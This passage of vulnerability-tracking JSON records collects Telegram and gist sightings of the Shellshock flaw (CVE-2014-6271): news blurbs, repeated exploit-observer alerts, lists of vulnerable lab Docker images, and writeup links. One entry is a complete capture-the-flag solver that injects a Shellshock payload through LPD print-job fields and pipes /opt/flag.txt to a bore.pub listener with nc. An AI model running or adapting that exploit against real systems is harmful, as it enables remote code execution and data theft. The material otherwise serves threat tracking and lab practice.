\u062f\u0633\u062a\u0648\u0631\u0647\u0627\u06cc \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 \u0628\u0627\u0644\u0627 \u0631\u0627 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f. \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u06cc\u0627\u062f\u0634\u062f\u0647 \u06a9\u0647 \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 CVE-2014-6271 \u0634\u0646\u0627\u062e\u062a\u0647 \u0645\u06cc\u0634\u0648\u062f\u060c \u062a\u0627 \u06a9\u0646\u0648\u0646 \u0628\u0647 \u0634\u0645\u0627\u0631 \u0628\u0633\u06cc\u0627\u0631\u06cc \u062f\u0633\u062a\u06af\u0627\u0647\u060c \u0645\u0627\u0646\u0646\u062f: \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0634\u0628\u06a9\u0647\u060c \u062f\u0633\u062a\u06af\u0627\u0647 \u0647\u0627\u06cc \u0627\u06cc\u0646\u062a\u0631\u0646\u062a \u0627\u0634\u06cc\u0627\u0621\u060c \u0686\u0627\u067e\u06af\u0631\u0647\u0627\u060c \u0633\u0627\u0645\u0627\u0646\u0647 \u0647\u0627\u06cc \u0633\u0631\u06af\u0631\u0645\u06cc \u062e\u0648\u062f\u06a9\u0627\u0631\u060c \u0631\u0647\u06cc\u0627\u0628 \u0647\u0627 \u0648 \u0633\u0627\u0645\u0627\u0646\u0647 \u0647\u0627\u06cc \u06a9\u0627\u0631\u062e\u0627\u0646\u0647 \u0627\u06cc \u062d\u0645\u0644\u0647 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a. \u0633\u0627\u0645\u0627\u0646\u0647 \u0647\u0627\u06cc \u0645\u06a9\u06cc\u0646\u062a\u0627\u0634 \u0646\u06cc\u0632 \u0627\u0632 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u06cc\u0627\u062f\u0634\u062f\u0647 \u062a\u0623\u062b\u06cc\u0631 \u067e\u0630\u06cc\u0631\u0641\u062a\u0647\u0627\u0646\u062f. \u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0627\u06cc\u0646\u06a9\u0647 \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647 \u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u062e\u0637 \u0641\u0631\u0645\u0627\u0646 \u0628\u0634 Bash \u0647\u0633\u062a\u0646\u062f\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0645\u062c\u0645\u0648\u0639\u0647 \u062f\u0633\u062a\u0648\u0631\u06a9\u0627\u0631\u0647\u0627 \u0631\u0627 \u0628\u0647 \u0633\u0631\u0648\u0631\u0647\u0627\u06cc \u0634\u0628\u06a9\u0647 \u0628\u0641\u0631\u0633\u062a\u062f \u0648 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0647\u0631\u0647 \u062c\u0648\u06cc\u06cc \u06a9\u0646\u062f. \u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646\u06a9\u0647 \u0647\u0645\u06af\u0627\u0646 \u0628\u0627 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0622\u0634\u0646\u0627 \u0634\u062f\u0646\u062f\u060c \u0686\u0646\u062f\u06cc\u0646 \u06af\u0632\u0627\u0631\u0634 \u062f\u0631\u0628\u0627\u0631\u06c0 \u0628\u0647\u0631\u0647 \u062c\u0648\u06cc\u06cc \u0627\u0632 \u0622\u0646\u060c \u062f\u0631 \u062f\u0646\u06cc\u0627\u06cc \u0648\u0627\u0642\u0639\u06cc \u0645\u0646\u062a\u0634\u0631 \u0634\u062f.\n\n\u0645\u0646\u0628\u0639: http://www.securityweek.com.", "creation_timestamp": "2017-03-11T17:39:18.000000Z"}, {"uuid": "33162b30-1474-4a7b-8779-55514200452f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://t.me/GithubRedTeam/40435", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2014-6271(RCE) poc Exploit\nURL\uff1ahttps://github.com/knightc0de/Shellshock_vuln_Exploit\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-06-14T12:01:38.000000Z"}, {"uuid": "f3d5e002-2d7e-4995-a98e-466980cbb2ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/70", "content": "\ud83d\udcbb Docker \u043e\u0431\u0440\u0430\u0437\u044b \u0434\u043b\u044f \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u043e\u0432\n\n\u25aa\ufe0fOfficial Kali Linux\ndocker pull kalilinux/kali-linux-docker\n******************************\n\u25aa\ufe0fOfficial OWASP ZAP\ndocker pull owasp/zap2docker-stable\n******************************\n\u25aa\ufe0fOfficial WPScan\ndocker pull wpscanteam/wpscan\n******************************\n\u25aa\ufe0fOfficial Metasploit\ndocker pull metasploitframework/metasploit-framework\n******************************\n\u25aa\ufe0fDamn Vulnerable Web Application (DVWA)\ndocker pull citizenstig/dvwa\n******************************\n\u25aa\ufe0fVulnerable WordPress Installation\ndocker pull wpscanteam/vulnerablewordpress\n******************************\n\u25aa\ufe0fVulnerability as a service: Shellshock\ndocker pull hmlio/vaas-cve-2014-6271\n******************************\n\u25aa\ufe0fVulnerability as a service: Heartbleed\ndocker pull hmlio/vaas-cve-2014-0160\n******************************\n\u25aa\ufe0fSecurity Ninjas\ndocker pull opendns/security-ninjas\n******************************\n\u25aa\ufe0fArch Linux Penetration Tester\ndocker pull noncetonic/archlinux-pentest-lxde\n******************************\n\u25aa\ufe0fDocker Bench for Security\ndocker pull diogomonica/docker-bench-security\n******************************\n\u25aa\ufe0fOWASP Security Shepherd\ndocker pull ismisepaul/securityshepherd\n******************************\n\u25aa\ufe0fOWASP WebGoat Project docker image\ndocker pull danmx/docker-owasp-webgoat\n******************************\n\u25aa\ufe0fOWASP NodeGoat\ndocker pull vulnerables/web-owasp-nodegoat\n******************************\n\u25aa\ufe0fOWASP Mutillidae II Web Pen-Test Practice Application\ndocker pull citizenstig/nowasp\n******************************\n\u25aa\ufe0fOWASP Juice Shop\ndocker pull bkimminich/juice-shop\n******************************\n\u25aa\ufe0fDocker Metasploit\ndocker pull phocean/msf\n\n#docker #pentest #images #useful\n\n// Pentest HaT \ud83c\udfa9", "creation_timestamp": "2023-08-20T15:48:59.000000Z"}, {"uuid": "d78fa4a1-35b0-4469-b862-4a3e0bc2774a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "Telegram/pWh9oXm1NWWZEdeLjOyDfp59yY5k-322VAVSQFlsbZDzP-c", "content": "", "creation_timestamp": "2025-07-25T21:00:04.000000Z"}, {"uuid": "9381c347-e1ce-461c-bb74-e15ace0188b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "Telegram/iimLBgfveRJNPn8n15oXMCE3voNQwpoaxofI1bBvnb3-u_k", "content": "", "creation_timestamp": "2023-03-23T21:11:10.000000Z"}, {"uuid": "675d7d28-e22d-44b6-9884-3ec8847362b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "Telegram/yVJNyXeSsFnnTlXDbJzDwv8EPdIujynRVvoJjLOyi6FDMcAA", "content": "", "creation_timestamp": "2025-02-14T10:00:30.000000Z"}, {"uuid": "c1124464-3474-4e75-999b-9f48c7541089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/arpsyndicate/1911", "content": "#ExploitObserverAlert\n\nCVE-2014-6277\n\nDESCRIPTION: Exploit Observer has 127 entries related to CVE-2014-6277. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.\n\nFIRST-EPSS: 0.973120000\nNVD-IS: 10.0\nNVD-ES: 10.0", "creation_timestamp": "2023-12-18T04:29:01.000000Z"}, {"uuid": "f5d09430-29cf-4603-b8a9-eb24f6edb3de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/arpsyndicate/1552", "content": "#ExploitObserverAlert\n\nCVE-2014-6271\n\nDESCRIPTION: Exploit Observer has 751 entries related to CVE-2014-6271. GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.\n\nFIRST-EPSS: 0.975680000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-08T11:54:24.000000Z"}, {"uuid": "877bdea8-bdc9-4e68-92de-ea8a8614a53a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/arpsyndicate/1926", "content": "#ExploitObserverAlert\n\nCVE-2014-6278\n\nDESCRIPTION: Exploit Observer has 142 entries related to CVE-2014-6278. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\n\nFIRST-EPSS: 0.973450000\nNVD-IS: 10.0\nNVD-ES: 10.0", "creation_timestamp": "2023-12-18T06:11:35.000000Z"}, {"uuid": "6c6086b3-f0ac-4231-b35a-8bc6434fe202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/arpsyndicate/1882", "content": "#ExploitObserverAlert\n\nCVE-2014-6271\n\nDESCRIPTION: Exploit Observer has 751 entries related to CVE-2014-6271. GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.\n\nFIRST-EPSS: 0.975640000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-18T01:35:53.000000Z"}, {"uuid": "b3038720-04bc-4e90-8a3a-47f32a853966", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/arpsyndicate/863", "content": "#ExploitObserverAlert\n\nCVE-2014-6271\n\nDESCRIPTION: Exploit Observer has 751 entries related to CVE-2014-6271. GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.\n\nFIRST-EPSS: 0.975680000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-02T00:20:21.000000Z"}, {"uuid": "cd0ff307-04f6-4ea1-b64d-7284d9a5d3c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/arpsyndicate/90", "content": "#ExploitObserverAlert\n\nCVE-2014-6271\n\nDESCRIPTION: Exploit Observer has 740 entries related to CVE-2014-6271. GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.\n\nFIRST-EPSS: 0.975680000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-11-11T18:06:24.000000Z"}, {"uuid": "744226e9-80ef-4f08-a54b-9fb63e642020", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "Telegram/Q9EyMFW9fyFkWZ-WThrUbkO902P6GRwB2-5uJtjTjfi-KDQ", "content": "", "creation_timestamp": "2025-05-06T05:00:07.000000Z"}, {"uuid": "d7c7984f-8bdd-496b-a0b6-af755dcffc7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/arpsyndicate/1499", "content": "#ExploitObserverAlert\n\nCVE-2014-6271\n\nDESCRIPTION: Exploit Observer has 751 entries related to CVE-2014-6271. GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.\n\nFIRST-EPSS: 0.975680000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-06T15:07:45.000000Z"}, {"uuid": "e5687788-a5c0-421c-b5e2-0edb31c280e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/arpsyndicate/1451", "content": "#ExploitObserverAlert\n\nCVE-2014-6271\n\nDESCRIPTION: Exploit Observer has 751 entries related to CVE-2014-6271. GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.\n\nFIRST-EPSS: 0.975680000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-05T10:07:27.000000Z"}, {"uuid": "92cc865d-68a7-4a4f-ad82-e9375672e981", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "https://t.me/NewBlood_Project/446", "content": "Docker Containers of Intentionally Vulnerable Systems\n\n* Damn Vulnerable Web Application DVWA \ndocker pull citizenstig/dvwa\n\n* OWASP Juice Shop \ndocker pull bkimminich/juice-shop\n\n* OWASP Mutillidae II Web Pen-Test Practice Application \ndocker pull citizenstig/nowasp\n\n* OWASP NodeGoat \ndocker-compose build && docker-compose up\n\n* OWASP Security Shepherd \ndocker pull ismisepaul/securityshepherd\n\n* OWASP WebGoat Project 7.1 docker image \ndocker pull webgoat/webgoat-7.1\n\n* OWASP WebGoat Project 8.0 docker image \ndocker pull webgoat/webgoat-8.0\n\n* Vulnerability as a service: Heartbleed \ndocker pull hmlio/vaas-cve-2014-0160\n\n* Vulnerability as a service: SambaCry \ndocker pull vulnerables/cve-2017-7494\n\n* Vulnerability as a service: Shellshock \ndocker pull hmlio/vaas-cve-2014-6271\n\n* Vulnerable WordPress Installation \ndocker pull wpscanteam/vulnerablewordpress\n\n\nDocker Containers of Penetration Testing Distributions and Tools\n\n* Docker Bench for Security \ndocker pull diogomonica/docker-bench-security\n\n* Official Kali Linux \ndocker pull kalilinux/kali-linux-docker\n\n* Official OWASP ZAP \ndocker pull owasp/zap2docker-stable\n\n* Official WPScan \ndocker pull wpscanteam/wpscan\n\n* Security Ninjas \ndocker pull opendns/security-ninjas\n\n* docker-metasploit \ndocker pull phocean/msf", "creation_timestamp": "2023-03-18T23:40:27.000000Z"}, {"uuid": "ad259f5f-e3d9-4a24-a9d4-23741881c51f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://t.me/netrunnerz/323", "content": "#Docker\n\nPentest Docker Step-By-Step\n\n\u041e\u0431\u0440\u0430\u0437 Docker \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 RCE, \u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0430 \u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 (trivy, falco \u0438 \u0442.\u0434.). \u041e\u0431\u0440\u0430\u0437 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 (CVE-2014-6271) \u043f\u0430\u043a\u0435\u0442 Bash, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430 \u043a\u0430\u043a Shellshock. \u0417\u0430 \u043e\u0441\u043d\u043e\u0432\u0443 \u0432\u0437\u044f\u0442 \u043e\u0431\u0440\u0430\u0437 \u043e\u0442 opsxcq.", "creation_timestamp": "2022-11-06T10:26:54.000000Z"}, {"uuid": "1b328f87-58a5-4948-8470-6305be5b562f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "Telegram/eal9Ra0ypGkEhYFNQI-UasMXMNQG9dqnJsA3nKGQdMfgq1c", "content": "", "creation_timestamp": "2025-02-26T16:00:08.000000Z"}, {"uuid": "a7b6241b-4234-4ec6-a230-a32e0eb8ec10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://t.me/BABATATASASA/6848", "content": "Lab Walkthrough - Shockin\u2019 Shells: ShellShock (CVE-2014-6271) | INE\nhttps://ine.com/blog/shockin-shells-shellshock-cve-2014-6271", "creation_timestamp": "2024-04-05T23:45:09.000000Z"}, {"uuid": "01d0c03a-b71c-4bf5-b970-bd887138c910", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "Telegram/Bh4iyBQIMN2Hl9Jl9GcG_tuPw1Psk_odE0qn4w68HKrpiOc", "content": "", "creation_timestamp": "2026-05-01T03:00:05.000000Z"}, {"uuid": "df98fe7e-a467-4086-8d64-ed1591bc543f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "Telegram/mW8zzq1rqMc5SkbZPoSXfLArhev2osDNJkd9a0dBK83s5w", "content": "", "creation_timestamp": "2021-03-10T21:14:25.000000Z"}, {"uuid": "5dc2b746-83fe-4050-b4a6-e426f8b0617c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "Telegram/TOBO1j4X53-mWPhUjqfqsPILi5P8C_iHzeNGcih4hj7jhkY", "content": "", "creation_timestamp": "2026-05-05T15:00:07.000000Z"}, {"uuid": "d2789ff5-3de3-40a3-8e72-1f6e1fa658a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://gist.github.com/saad0x1/ecab3c418f1521455cfdbfc2d6309d52", "content": "#!/usr/bin/env python3\n\"\"\"\nLine \u2014 LPD Shellshock (CVE-2014-6271) exfiltration\nRemote solver. Usage: python3 solve.py \n\nAttack: LPD (RFC 1179) 'in' mode sets ALL control-file fields (H, P, J, N, T, U\u2026)\nto attacker-controlled input. The LPD daemon on the server passes those fields\nthrough a bash(1) shell that has NOT been patched against Shellshock \u2014 injecting\n() {:;}; triggers arbitrary code execution.\n\nFlag lives at /opt/flag.txt and is exfiltrated via a bore.pub reverse shell or\nany other outbound callback. Here we use a local nc listener via bore.pub tunnel.\n\nQuick reproduce:\n bore local 9001 --to bore.pub # get remote_port, e.g. 55246\n nc -nvlp 9001 & # local listener\n python3 solve.py 154.57.164.79:31117 55246 bore.pub\n\nOr just run the script with a callback host/port you control.\n\"\"\"\n\nimport sys\nimport socket\n\n# \u2500\u2500 RFC 1179 helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\nqueue = \"lp\"\n\n\ndef ack(s):\n r = s.recv(4096)\n if r != b\"\\x00\":\n print(f\"[!] Negative ACK: {r!r}\")\n s.send(b\"\\x01\\n\")\n s.close()\n sys.exit(1)\n\n\ndef lpd_send_job(host, port, payload):\n \"\"\"\n Send an LPD print job where EVERY field \u2014 including the sub-command\n filename headers \u2014 is set to `payload`. The Shellshock trigger is the\n filename in \"\\x02 \\n\" and \"\\x03 \\n\"\n (PRET lpdtest 'in' mode behaviour).\n \"\"\"\n # All of these are set to the raw payload, matching PRET exactly\n p_ctrlfile = payload\n p_datafile = payload\n\n ctrl = \"\"\n ctrl += \"H\" + payload + \"\\n\" # hostname\n ctrl += \"P\" + payload + \"\\n\" # user\n ctrl += \"U\" + payload + \"\\n\" # unlink data file\n ctrl += \"J\" + payload + \"\\n\" # job name\n ctrl += \"C\" + payload + \"\\n\" # class for banner\n ctrl += \"L\" + payload + \"\\n\" # print banner\n ctrl += \"T\" + payload + \"\\n\" # title for pr\n ctrl += \"N\" + payload + \"\\n\" # source file name\n ctrl += \"p\" + payload + \"\\n\" # print with pr format\n ctrl += \"f\" + payload + \"\\n\" # print file leaving ctrl chars\n\n data = f\"Print job from lpdtest 'in' and argument '{payload}'.\"\n\n s = socket.socket()\n s.connect((host, port))\n\n s.send((\"\\x02\" + queue + \"\\n\").encode())\n ack(s)\n\n # Key: filename in the sub-command header IS the payload (not \"cfA001\")\n s.send((\"\\x02\" + str(len(ctrl)) + \" \" + p_ctrlfile + \"\\n\").encode())\n ack(s)\n s.send((ctrl + \"\\x00\").encode())\n ack(s)\n\n # data file filename also = payload\n s.send(((\"\\x03\" + str(len(data)) + \" \" + p_datafile + \"\\n\")).encode())\n ack(s)\n s.send((data + \"\\x00\").encode())\n ack(s)\n\n s.close()\n\n\n# \u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef main():\n if len(sys.argv) < 2:\n print(f\"Usage: {sys.argv[0]} [callback_port] [callback_host]\")\n print(f\" e.g. {sys.argv[0]} 154.57.164.79:31117 55246 bore.pub\")\n sys.exit(1)\n\n addr = sys.argv[1]\n cbport = sys.argv[2] if len(sys.argv) > 2 else \"9001\"\n cbhost = sys.argv[3] if len(sys.argv) > 3 else \"bore.pub\"\n\n ip, port = addr.split(\":\")\n port = int(port)\n\n # Shellshock payload: exfiltrate /opt/flag.txt via netcat to our listener\n shellshock = f\"() {{:;}}; cat /opt/flag.txt | nc {cbhost} {cbport}\"\n\n print(f\"[*] Target : {ip}:{port}\")\n print(f\"[*] Callback: {cbhost}:{cbport}\")\n print(f\"[*] Payload : {shellshock}\")\n print(f\"[*] Make sure you have a listener: nc -nvlp 9001\")\n print(f\"[*] (or: bore local 9001 --to bore.pub)\")\n\n lpd_send_job(ip, port, shellshock)\n print(f\"[+] Job submitted. Check your listener for the flag.\")\n\n\nif __name__ == \"__main__\":\n main()", "creation_timestamp": "2026-05-25T18:38:59.000000Z"}, {"uuid": "6e2d666a-9166-4ee1-a8b1-b9547ecee401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/bhhub/1146", "content": "Today's Must-Read Bug Bounty Writeups\n\n\u2728 ShellShock: Bash Vulnerability Exploits & Mitigation \nA deep dive into ShellShock (CVE-2014-6271), showing how attackers abuse environment variable parsing in Bash to execute arbitrary code. The article explains real-world exploitation scenarios, including web server CGI attacks, and provides defensive techniques like prompt updating of Bash versions and strict input validation. Read more \n\n\u2728 API Hacking Guide: 2025 Edition \nThis comprehensive guide covers API security from authentication bypasses to GraphQL batching attacks, with updated techniques for modern web architectures. It highlights OAuth misconfigurations and serverless API vulnerabilities that are trending in bug bounty programs. Read more \n\n\u2728 Race Condition Bug Exploitation Walkthrough \nDetailed analysis of three unique TOCTOU 